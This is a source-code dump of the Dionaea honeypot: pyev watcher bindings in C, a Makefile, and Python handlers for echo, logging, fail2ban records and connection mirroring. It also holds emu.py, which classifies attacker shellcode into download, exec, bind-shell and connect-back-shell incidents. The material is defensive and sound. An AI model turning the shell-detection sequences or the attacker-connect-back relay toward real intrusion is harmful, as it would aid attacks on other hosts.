56 | 0, /*tp_itemsize*/ 57 | 0, /*tp_dealloc*/ 58 | 0, /*tp_print*/ 59 | 0, /*tp_getattr*/ 60 | 0, /*tp_setattr*/ 61 | 0, /*tp_compare*/ 62 | 0, /*tp_repr*/ 63 | 0, /*tp_as_number*/ 64 | 0, /*tp_as_sequence*/ 65 | 0, /*tp_as_mapping*/ 66 | 0, /*tp_hash */ 67 | 0, /*tp_call*/ 68 | 0, /*tp_str*/ 69 | 0, /*tp_getattro*/ 70 | 0, /*tp_setattro*/ 71 | 0, /*tp_as_buffer*/ 72 | 
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 73 | 0, /*tp_doc*/ 74 | 0, /*tp_traverse*/ 75 | 0, /*tp_clear*/ 76 | 0, /*tp_richcompare*/ 77 | 0, /*tp_weaklistoffset*/ 78 | 0, /*tp_iter*/ 79 | 0, /*tp_iternext*/ 80 | PeriodicBase_tp_methods, /*tp_methods*/ 81 | 0, /*tp_members*/ 82 | 0, /*tp_getsets*/ 83 | 0, /*tp_base*/ 84 | 0, /*tp_dict*/ 85 | 0, /*tp_descr_get*/ 86 | 0, /*tp_descr_set*/ 87 | 0, /*tp_dictoffset*/ 88 | 0, /*tp_init*/ 89 | 0, /*tp_alloc*/ 90 | PeriodicBase_tp_new, /*tp_new*/ 91 | }; 92 | -------------------------------------------------------------------------------- /modules/python/pyev/Prepare.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * PrepareType 3 | *******************************************************************************/ 4 | 5 | /* PrepareType.tp_doc */ 6 | PyDoc_STRVAR(Prepare_tp_doc, 7 | "Prepare(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* PrepareType.tp_new */ 11 | static PyObject * 12 | Prepare_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Prepare *self = (Prepare *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->prepare, EV_PREPARE); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* PrepareType */ 24 | static PyTypeObject PrepareType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Prepare", /*tp_name*/ 27 | sizeof(Prepare), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, 
/*tp_flags*/
    Prepare_tp_doc,                           /*tp_doc*/
    0,                                        /*tp_traverse*/
    0,                                        /*tp_clear*/
    0,                                        /*tp_richcompare*/
    0,                                        /*tp_weaklistoffset*/
    0,                                        /*tp_iter*/
    0,                                        /*tp_iternext*/
    0,                                        /*tp_methods*/
    0,                                        /*tp_members*/
    0,                                        /*tp_getsets*/
    0,                                        /*tp_base*/
    0,                                        /*tp_dict*/
    0,                                        /*tp_descr_get*/
    0,                                        /*tp_descr_set*/
    0,                                        /*tp_dictoffset*/
    0,                                        /*tp_init*/
    0,                                        /*tp_alloc*/
    Prepare_tp_new,                           /*tp_new*/
};

--------------------------------------------------------------------------------
/modules/python/pyev/Signal.c:
--------------------------------------------------------------------------------
/*******************************************************************************
* utilities
*******************************************************************************/

/* set the Signal
 *
 * Validate `signum` (which comes straight from Python callers) and bind the
 * watcher to it. The range check is the only thing keeping the
 * `signals[signum - 1]` lookup below inside libev's per-signal table, so it
 * must stay ahead of any indexing; the upper bound EV_NSIG mirrors how that
 * internal table is sized in the libev build this file is compiled against.
 * Returns 0 on success, -1 with a pyev Error set otherwise.
 */
int
set_Signal(Signal *self, int signum)
{
    if (signum <= 0 || signum >= EV_NSIG) {
        PyErr_SetString(Error, "illegal signal number");
        return -1;
    }
#if EV_MULTIPLICITY
    /* A signal may only be watched from one loop; refuse to rebind it to a
     * second loop instead of letting libev misbehave. */
    if (signals[signum - 1].loop &&
        signals[signum - 1].loop != ((Watcher *)self)->loop->loop) {
        PyErr_SetString(Error, "the same signal must not be attached to two "
                        "different loops");
        return -1;
    }
#endif
    ev_signal_set(&self->signal, signum);
    return 0;
}


/*******************************************************************************
* SignalType
*******************************************************************************/

/* SignalType.tp_doc */
PyDoc_STRVAR(Signal_tp_doc,
"Signal(signum, loop, callback[, data=None, priority=0])");


/* SignalType.tp_new
 * Allocate through the Watcher base type and attach the embedded ev_signal
 * as the underlying libev watcher. */
static PyObject *
Signal_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs)
{
    Signal *self = (Signal *)WatcherType.tp_new(type, args, kwargs);
    if (!self) {
        return NULL;
    }
    new_Watcher((Watcher *)self, (ev_watcher *)&self->signal, EV_SIGNAL);
    return (PyObject *)self;
}


/* SignalType.tp_init
 * Parse (signum, loop, callback[, data, priority]); `loop` is type-checked
 * against LoopType by PyArg_ParseTupleAndKeywords, `signum` is validated by
 * set_Signal(). NOTE(review): if set_Signal() rejects signum after
 * init_Watcher() succeeded, the half-initialised watcher keeps its loop and
 * callback references — confirm tp_dealloc releases them. */
static int
Signal_tp_init(Signal *self, PyObject *args, PyObject *kwargs)
{
    int signum;
    Loop *loop;
    PyObject *callback, *data = NULL;
    int priority = 0;

    static char *kwlist[] = {"signum",
                             "loop", "callback", "data", "priority", NULL};

    if (!PyArg_ParseTupleAndKeywords(args, kwargs, "iO!O|Oi:__init__", kwlist,
            &signum,
            &LoopType, &loop, &callback, &data, &priority)) {
        return -1;
    }
    if (init_Watcher((Watcher *)self, loop, callback, 1, data, priority)) {
        return -1;
    }
    return set_Signal(self, signum);
}


/* Signal.set(signum)
 * Re-target an existing watcher. PYEV_SET_ACTIVE_WATCHER presumably rejects
 * the call while the watcher is active (libev forbids re-setting active
 * watchers); the new signum goes through the same validation as __init__. */
PyDoc_STRVAR(Signal_set_doc,
"set(signum)");

static PyObject *
Signal_set(Signal *self, PyObject *args)
{
    int signum;

    PYEV_SET_ACTIVE_WATCHER(self);
    if (!PyArg_ParseTuple(args, "i:set", &signum)) {
        return NULL;
    }
    if (set_Signal(self, signum)) {
        return NULL;
    }
    Py_RETURN_NONE;
}


/* SignalType.tp_methods */
static PyMethodDef Signal_tp_methods[] = {
    {"set", (PyCFunction)Signal_set,
     METH_VARARGS, Signal_set_doc},
    {NULL}  /* Sentinel */
};


/* Signal.signum */
PyDoc_STRVAR(Signal_signum_doc,
"signum");


/* SignalType.tp_members
 * signum is exposed read-only; changing it must go through set() so the
 * range and loop checks in set_Signal() always run. */
static PyMemberDef Signal_tp_members[] = {
    {"signum", T_INT, offsetof(Signal, signal.signum),
     READONLY, Signal_signum_doc},
    {NULL}  /* Sentinel */
};


/* SignalType */
static PyTypeObject SignalType = {
    PyVarObject_HEAD_INIT(NULL, 0)
    "pyev.Signal",                            /*tp_name*/
    sizeof(Signal),                           /*tp_basicsize*/
    0,                                        /*tp_itemsize*/
    0,                                        /*tp_dealloc*/
    0,                                        /*tp_print*/
    0,                                        /*tp_getattr*/
    0,                                        /*tp_setattr*/
    0,                                        /*tp_compare*/
    0,                                        /*tp_repr*/
0, /*tp_as_number*/ 126 | 0, /*tp_as_sequence*/ 127 | 0, /*tp_as_mapping*/ 128 | 0, /*tp_hash */ 129 | 0, /*tp_call*/ 130 | 0, /*tp_str*/ 131 | 0, /*tp_getattro*/ 132 | 0, /*tp_setattro*/ 133 | 0, /*tp_as_buffer*/ 134 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 135 | Signal_tp_doc, /*tp_doc*/ 136 | 0, /*tp_traverse*/ 137 | 0, /*tp_clear*/ 138 | 0, /*tp_richcompare*/ 139 | 0, /*tp_weaklistoffset*/ 140 | 0, /*tp_iter*/ 141 | 0, /*tp_iternext*/ 142 | Signal_tp_methods, /*tp_methods*/ 143 | Signal_tp_members, /*tp_members*/ 144 | 0, /*tp_getsets*/ 145 | 0, /*tp_base*/ 146 | 0, /*tp_dict*/ 147 | 0, /*tp_descr_get*/ 148 | 0, /*tp_descr_set*/ 149 | 0, /*tp_dictoffset*/ 150 | (initproc)Signal_tp_init, /*tp_init*/ 151 | 0, /*tp_alloc*/ 152 | Signal_tp_new, /*tp_new*/ 153 | }; 154 | -------------------------------------------------------------------------------- /modules/python/scripts/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | PYSCRIPTS = sip/__init__.py 6 | PYSCRIPTS += sip/extras.py 7 | PYSCRIPTS += sip/rfc2396.py 8 | PYSCRIPTS += sip/rfc2617.py 9 | PYSCRIPTS += sip/rfc3261.py 10 | PYSCRIPTS += sip/rfc4566.py 11 | PYSCRIPTS += tftp.py 12 | PYSCRIPTS += echo.py 13 | PYSCRIPTS += ftp.py 14 | PYSCRIPTS += services.py 15 | PYSCRIPTS += smb/include/fieldtypes.py 16 | PYSCRIPTS += smb/include/smbfields.py 17 | PYSCRIPTS += smb/include/__init__.py 18 | PYSCRIPTS += smb/include/helpers.py 19 | PYSCRIPTS += smb/include/packet.py 20 | PYSCRIPTS += smb/include/asn1fields.py 21 | PYSCRIPTS += smb/include/asn1packet.py 22 | PYSCRIPTS += smb/include/asn1/__init__.py 23 | PYSCRIPTS += smb/include/asn1/asn1.py 24 | PYSCRIPTS += smb/include/asn1/ber.py 25 | PYSCRIPTS += smb/include/asn1/mib.py 26 | PYSCRIPTS += smb/include/ntlmfields.py 27 | PYSCRIPTS += smb/include/gssapifields.py 28 | PYSCRIPTS += smb/__init__.py 29 | PYSCRIPTS += smb/smb.py 30 | PYSCRIPTS += 
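smb/rpcservices.py
PYSCRIPTS += test.py
PYSCRIPTS += mirror.py
PYSCRIPTS += nfq.py
PYSCRIPTS += http.py
PYSCRIPTS += log.py
PYSCRIPTS += logsql.py
PYSCRIPTS += p0f.py
PYSCRIPTS += cmd.py
PYSCRIPTS += emu.py
PYSCRIPTS += ihandlers.py
PYSCRIPTS += util.py
PYSCRIPTS += store.py
PYSCRIPTS += surfids.py
PYSCRIPTS += virustotal.py
PYSCRIPTS += mwserv.py
PYSCRIPTS += submit_http.py
PYSCRIPTS += hpfeeds.py
PYSCRIPTS += ndrlib.py
PYSCRIPTS += logxmpp.py
PYSCRIPTS += fail2ban.py
PYSCRIPTS += __init__.py
PYSCRIPTS += mssql/__init__.py
PYSCRIPTS += mssql/mssql.py
PYSCRIPTS += mssql/include/tds.py
PYSCRIPTS += mssql/include/__init__.py
PYSCRIPTS += mysql/__init__.py
PYSCRIPTS += mysql/mysql.py
PYSCRIPTS += mysql/include/packets.py
PYSCRIPTS += mysql/include/fields.py
PYSCRIPTS += mysql/include/__init__.py
PYSCRIPTS += pptp/__init__.py
PYSCRIPTS += pptp/pptp.py
PYSCRIPTS += pptp/include/packets.py
PYSCRIPTS += pptp/include/__init__.py
PYSCRIPTS += mqtt/__init__.py
# mqtt/mqtt.py was listed twice; one entry is enough, the install loop
# below would otherwise copy it a second time.
PYSCRIPTS += mqtt/mqtt.py
PYSCRIPTS += mqtt/include/packets.py
PYSCRIPTS += mqtt/include/__init__.py
PYSCRIPTS += upnp/__init__.py
PYSCRIPTS += upnp/upnp.py


all: $(PYSCRIPTS)


# Install every script below $(pkglibdir)/python/dionaea/, creating the
# package sub-directories on demand.  All shell variables are quoted so a
# DESTDIR or pkglibdir containing whitespace is not word-split.
install-data-am: all
	for i in $(PYSCRIPTS); do \
		location="$(DESTDIR)$(pkglibdir)/python/dionaea/$$i"; \
		scriptdir=`dirname "$$location"`; \
		if [ ! -d "$$scriptdir" ]; then \
			$(mkinstalldirs) "$$scriptdir"; \
		fi; \
		$(INSTALL_DATA) "$$i" "$$location"; \
	done

EXTRA_DIST = $(PYSCRIPTS)
# --------------------------------------------------------------------------------
# /modules/python/scripts/__init__.py:
# https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/__init__.py
# --------------------------------------------------------------------------------
# /modules/python/scripts/echo.py:
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter & Mark Schloesser
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at your option) any later version.
#*
#* This program is distributed in the hope that it will be useful,
#* but WITHOUT ANY WARRANTY; without even the implied warranty of
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.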
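#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/


from dionaea.core import connection


class echo(connection):
    """Toy service: greets the peer and echoes each line back reversed.

    Kept as a minimal example of the connection callback interface; it is
    not a protocol emulation and is only started from the commented-out
    snippet at the bottom of this file.
    """

    def __init__(self, proto=None):
        print("echo init")
        connection.__init__(self, proto)
        # short idle/sustain timeouts so a probe cannot hold the slot open
        self.timeouts.idle = 5.
        self.timeouts.sustain = 10.

    def handle_origin(self, parent):
        # called when this connection was spawned from another one
        print("origin!")
        print("parent {:s} {:s}:{:d}".format(parent.protocol, parent.local.host, parent.local.port))
        print("self {:s} {:s}:{:d} -> {:s}:{:d}".format(self.protocol, self.local.host, self.local.port, self.remote.host, self.remote.port))

    def handle_established(self):
        print("new connection to serve!")
        # NOTE(review): the greeting and the timeout messages are sent as str
        # while handle_io_in sends bytes; confirm connection.send accepts both.
        self.send('welcome to reverse world!\n')

    def handle_timeout_idle(self):
        # True keeps the connection open after an idle timeout
        self.send("you are idle!\n")
        return True

    def handle_timeout_sustain(self):
        # False lets the connection be torn down
        self.send("your sustain timeouted!\n")
        return False

    def handle_disconnect(self):
        self.send("disconnecting you!\n")

    def handle_io_in(self, data):
        """Reverse the received line and send it back; consumes all input."""
        print('py_io_in\n')
        # Drop only a genuine trailing newline before reversing.  The previous
        # version discarded the first byte of the reversed buffer
        # unconditionally, which ate a payload byte whenever the peer sent
        # data without a terminating '\n'.
        line = data[:-1] if data.endswith(b'\n') else data
        self.send(line[::-1] + b'\n')
        return len(data)

#
#e = echo(proto='tcp')
#e.bind('0.0.0.0',4713,'')
#e.listen()

# --------------------------------------------------------------------------------
# /modules/python/scripts/emu.py:
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter & Mark Schloesser
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at your option) any later version.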
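#*
#* This program is distributed in the hope that it will be useful,
#* but WITHOUT ANY WARRANTY; without even the implied warranty of
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/


from dionaea.core import ihandler, incident
from dionaea.core import connection
from dionaea.cmd import cmdexe
import logging
import json

logger = logging.getLogger('emu')
logger.setLevel(logging.DEBUG)


def _arg(api, n):
    """n-th entry of a profile record's 'args' list, or None when absent.

    The profile is produced from attacker-controlled shellcode, so a record
    may lack the argument the state machine expects; that must not take the
    whole handler down.
    """
    try:
        return api['args'][n]
    except (KeyError, IndexError, TypeError):
        return None


def _sockaddr(api):
    """(host, port) from a bind/connect record's sockaddr argument, or
    (None, None) when the record is malformed."""
    sa = _arg(api, 1)
    try:
        return sa['sin_addr']['s_addr'], sa['sin_port']
    except (KeyError, TypeError):
        return None, None


class emuprofilehandler(ihandler):
    """Turns a shellcode API-call profile into dionaea incidents.

    The profile is a JSON list of {"call": ..., "args": [...]} records.  A
    small state machine recognises URL downloads (download.offer), command
    execution (fed to the cmd emulator) and bind / connect-back shells
    (service.shell.listen / service.shell.connect).
    """

    def __init__(self, path):
        logger.debug("%s ready!" % (self.__class__.__name__))
        ihandler.__init__(self, path)

    def _offer_download(self, url, con):
        """Report a URLDownloadToFile as a download offer."""
        if not url:
            logger.debug("URLDownloadToFile without a url argument")
            return
        logger.debug("download file %s" % (url))
        i = incident("dionaea.download.offer")
        i.set("url", url)
        if con is not None:
            i.set("con", con)
        i.report()

    def _exec(self, cmdline, con):
        """Hand a WinExec / CreateProcess command line to the cmd emulator."""
        if not isinstance(cmdline, str):
            logger.debug("command line argument missing or not a string: %r" % (cmdline,))
            return
        r = cmdexe(None)
        r.con = con
        r.handle_io_in(cmdline.encode() + b'\0')

    def _report_shell(self, origin, host, port, con):
        """Report a shell incident; host is only attached when known."""
        try:
            port = int(port)
        except (TypeError, ValueError):
            logger.warning("%s: unusable port %r, not reporting" % (origin, port))
            return
        i = incident(origin)
        i.set("port", port)
        if host is not None:
            i.set("host", host)
        if con is not None:
            i.set("con", con)
        i.report()

    def handle_incident(self, icd):
        logger.debug("profiling")
        p = icd.get("profile")
        # the incident carries a connection only when the emulation had one
        try:
            con = icd.get("con")
        except AttributeError:
            con = None
        try:
            p = json.loads(p)
        except (TypeError, ValueError):
            logger.warning("profile is not valid JSON, ignoring it")
            return
        logger.info("profiledump %s" % (p))
        if not isinstance(p, list):
            logger.warning("profile is not a list of api calls, ignoring it")
            return

        state = "NONE"
        host = None
        port = None

        for api in p:
            try:
                call = api['call']
            except (KeyError, TypeError):
                logger.debug("skipping malformed profile entry %r" % (api,))
                continue

            if state == "NONE":
                if call == 'WSASocket' or call == 'socket':
                    state = "SOCKET"
                elif call == 'URLDownloadToFile':
                    self._offer_download(_arg(api, 1), con)
                elif call == 'WinExec':
                    self._exec(_arg(api, 0), con)
                elif call == 'CreateProcess':
                    self._exec(_arg(api, 1), con)

            elif state == "SOCKET":
                if call == 'bind':
                    state = "BIND"
                    host, port = _sockaddr(api)
                elif call == 'connect':
                    state = "CONNECT"
                    host, port = _sockaddr(api)
                elif call == 'CreateProcess':
                    state = "CREATEPROCESS"

            elif state == "BIND":
                if call == 'listen':
                    state = "LISTEN"

            elif state == "LISTEN":
                if call == 'accept':
                    state = "ACCEPT"

            elif state == "ACCEPT":
                # socket/bind/listen/accept followed by a process: bind shell
                if call == 'CreateProcess':
                    logger.debug("bindshell host %s port %s" % (host, port) )
                    self._report_shell("dionaea.service.shell.listen", None, port, con)

            elif state == "CONNECT":
                # socket/connect followed by a process: connect-back shell
                if call == 'CreateProcess':
                    logger.debug("connectbackshell host %s port %s" % (host, port) )
                    self._report_shell("dionaea.service.shell.connect", host, port, con)

            elif state == "CREATEPROCESS":
                # process first, then connect: connect-back shell as well
                if call == 'connect':
                    host, port = _sockaddr(api)
                    logger.debug("connectbackshell host %s port %s" % (host, port) )
                    self._report_shell("dionaea.service.shell.connect", host, port, con)
                    state = "DONE"

        # lower the sustain timeout so the connection dies shortly after the
        # exploit: play dead, as a genuinely exploited service would.  The
        # previous version dereferenced con unconditionally and raised when
        # the incident carried no connection.
        if con is not None:
            con.timeouts.sustain = 3.0

# --------------------------------------------------------------------------------
# /modules/python/scripts/fail2ban.py:
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at your option) any later version.
#*
#* This program is distributed in the hope that it will be useful,
#* but WITHOUT ANY WARRANTY; without even the implied warranty of
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.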
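#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/


from dionaea.core import ihandler, incident, g_dionaea

import os
import logging
import random
import json
import re
import sqlite3
import datetime

logger = logging.getLogger('fail2ban')
logger.setLevel(logging.DEBUG)

# Anything that could break or forge a record in the space-separated flat
# files that fail2ban scans: line breaks and other control characters, and
# whitespace inside a field.
_UNSAFE = re.compile(r'[\s\x00-\x1f\x7f]+')


def _field(value):
    """Render one record field; control/whitespace runs become '_'.

    The url field comes straight out of attacker-supplied shellcode (see the
    emu handler), so an embedded newline could otherwise inject a complete
    fake record and make fail2ban ban an address of the attacker's choosing.
    An empty field is written as '-' so the column count stays stable.
    """
    return _UNSAFE.sub('_', str(value)) or '-'


def _hosts(icd):
    """(local, remote) host of the incident's connection.

    Returns ('-', '-') when the incident carries no connection; the emu
    handler attaches one only when it is known, and icd.con raises
    AttributeError when absent.
    """
    con = getattr(icd, 'con', None)
    if con is None:
        return '-', '-'
    return con.local.host, con.remote.host


class fail2banhandler(ihandler):
    """Appends download offers and completed downloads as one-line records
    to two flat files, for fail2ban (or any log scanner) to act on.

    Record format, fields separated by single spaces:
        offers:    <iso-timestamp> <local> <remote> <url>
        downloads: <iso-timestamp> <local> <remote> <url> <md5>
    """

    def __init__(self):
        logger.debug("%s ready!" % (self.__class__.__name__))
        ihandler.__init__(self, "*")
        cfg = g_dionaea.config()['modules']['python']['fail2ban']
        self.offers = open(cfg['offers'], "a")
        self.downloads = open(cfg['downloads'], "a")

    def stop(self):
        """Close both record files.

        mwserv.py's handler exposes the same hook; whether the core invokes
        it on shutdown is not visible from here, but closing explicitly is
        harmless either way.
        """
        for fh in (self.offers, self.downloads):
            if fh is not None:
                fh.close()
        self.offers = self.downloads = None

    def _record(self, fh, *fields):
        """Write one sanitised record and flush so it is visible at once."""
        fh.write(" ".join(_field(f) for f in fields) + "\n")
        fh.flush()

    def handle_incident_dionaea_download_offer(self, icd):
        local, remote = _hosts(icd)
        self._record(self.offers, datetime.datetime.now().isoformat(), local, remote, icd.url)

    def handle_incident_dionaea_download_complete_hash(self, icd):
        local, remote = _hosts(icd)
        self._record(self.downloads, datetime.datetime.now().isoformat(), local, remote, icd.url, icd.md5hash)

# --------------------------------------------------------------------------------
# /modules/python/scripts/log.py:
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at your option) any later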
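#* version.
#*
#* This program is distributed in the hope that it will be useful,
#* but WITHOUT ANY WARRANTY; without even the implied warranty of
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/

from dionaea.core import *
import logging

# module state installed by new() and removed by stop(); a module-level
# `global` statement alone (as before) does not create the names, so stop()
# before new() raised NameError
handler = None
logger = None


class DionaeaLogHandler(logging.Handler):
    """logging.Handler that forwards every record to the dionaea core
    (dlhfn from dionaea.core) so Python log lines end up in the same sink
    as the C side."""

    def __init__(self):
        logging.Handler.__init__(self, logging.DEBUG)

    def emit(self, record):
        # getMessage() applies the record's %-arguments; the previous version
        # forwarded record.msg verbatim, so any logger.info("... %s", x) call
        # lost its arguments on the way to the core.
        try:
            msg = record.getMessage()
        except Exception:
            # Handler convention: a malformed record must not propagate into
            # the code that logged it
            self.handleError(record)
            return
        dlhfn(record.name, record.levelno, record.pathname, record.lineno, msg)


def start():
    pass


def new():
    """Install the forwarding handler on the root logger."""
    global logger
    global handler
    logger = logging.getLogger('')
    logger.setLevel(logging.DEBUG)
    handler = DionaeaLogHandler()
    logger.addHandler(handler)


def stop():
    """Remove the handler installed by new(); a no-op if new() never ran."""
    global logger
    global handler
    if handler is not None and logger is not None:
        logger.removeHandler(handler)
    handler = None

# --------------------------------------------------------------------------------
# /modules/python/scripts/mirror.py:
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter
#* Copyright (c) 2006-2009 Michael P.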
#* Soulier
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at your option) any later version.
#*
#* This program is distributed in the hope that it will be useful,
#* but WITHOUT ANY WARRANTY; without even the implied warranty of
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/

from dionaea.core import connection
import struct
import logging
import os
import sys
import datetime

logger = logging.getLogger('mirror')
logger.setLevel(logging.DEBUG)


class mirrorc(connection):
    """Outbound half of the mirror.

    Dials the peer's source address on the very port the peer reached on our
    side (peer.remote.host:peer.local.port), so whatever the attacker sends
    is relayed to its own instance of that service and the answers are
    relayed back.  `peer` is the accepted mirrord connection; the default of
    None is not usable, the constructor dereferences it immediately.
    """

    def __init__(self, peer=None):
        logger.debug("mirror connection %s %s" %( peer.remote.host, peer.local.host))
        connection.__init__(self,peer.transport)
        # source the connect-back from the address the peer reached us on,
        # on an ephemeral port
        self.bind(peer.local.host,0)
        self.connect(peer.remote.host,peer.local.port)
        # self.connect('',peer.local.port)
        # NOTE(review): self.peer is assigned only after connect(); should
        # connect() ever fail synchronously and call handle_error first,
        # there would be no peer attribute yet -- verify in the core.
        self.peer = peer

    def handle_established(self):
        # connect-back succeeded: (re)point the accepted side at us
        self.peer.peer = self

    def handle_io_in(self, data):
        # relay whatever the remote service answers back to the attacker
        if self.peer:
            self.peer.send(data)
        return len(data)

    def handle_error(self, err):
        # connect-back side failed: unlink and drop the attacker's side too
        if self.peer:
            self.peer.peer = None
            self.peer.close()

    def handle_disconnect(self):
        # close() on the peer may re-enter its handle_disconnect and unlink
        # us, hence the second check before touching self.peer again
        if self.peer:
            self.peer.close()
        if self.peer:
            self.peer.peer = None
        return 0


class mirrord(connection):
    """Listening half of the mirror.

    Every accepted connection spawns a mirrorc that dials the attacker back;
    traffic is then relayed in both directions until either side closes.
    With host=None the object is created without binding or listening.
    """

    def __init__(self, proto=None, host=None, port=None, iface=None):
        connection.__init__(self,proto)
        if host:
            self.bind(host, port, iface)
            self.listen()
        # the listener itself never has a peer; accepted connections get one
        # in handle_established
        self.peer=None

    def handle_established(self):
        self.peer=mirrorc(self)
        # bound the cost of a mirrored session: 60 s lifetime and 100 KiB
        # accounted in each direction
        self.timeouts.sustain = 60
        self._in.accounting.limit = 100*1024
        self._out.accounting.limit = 100*1024

    def handle_io_in(self, data):
        # relay the attacker's input to the connect-back side
        if self.peer:
            self.peer.send(data)
        return len(data)

    def handle_error(self, err):
        logger.debug("mirrord connection error?, should not happen")
        if self.peer:
            self.peer.peer = None

    def handle_disconnect(self):
        # same re-entrancy caveat as mirrorc.handle_disconnect
        if self.peer:
            self.peer.close()
        if self.peer:
            self.peer.peer = None
        return 0

# --------------------------------------------------------------------------------
# /modules/python/scripts/mqtt/__init__.py:
# https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mqtt/__init__.py
# --------------------------------------------------------------------------------
# /modules/python/scripts/mqtt/include/__init__.py:
# https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mqtt/include/__init__.py
# --------------------------------------------------------------------------------
# /modules/python/scripts/mssql/__init__.py:
# https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mssql/__init__.py
# --------------------------------------------------------------------------------
# /modules/python/scripts/mssql/include/__init__.py:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mssql/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mwserv.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2010 Mark Schloesser 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
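#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/

from dionaea.core import ihandler, incident, g_dionaea
from dionaea.util import md5file, sha512file
from dionaea import pyev

import logging
import json
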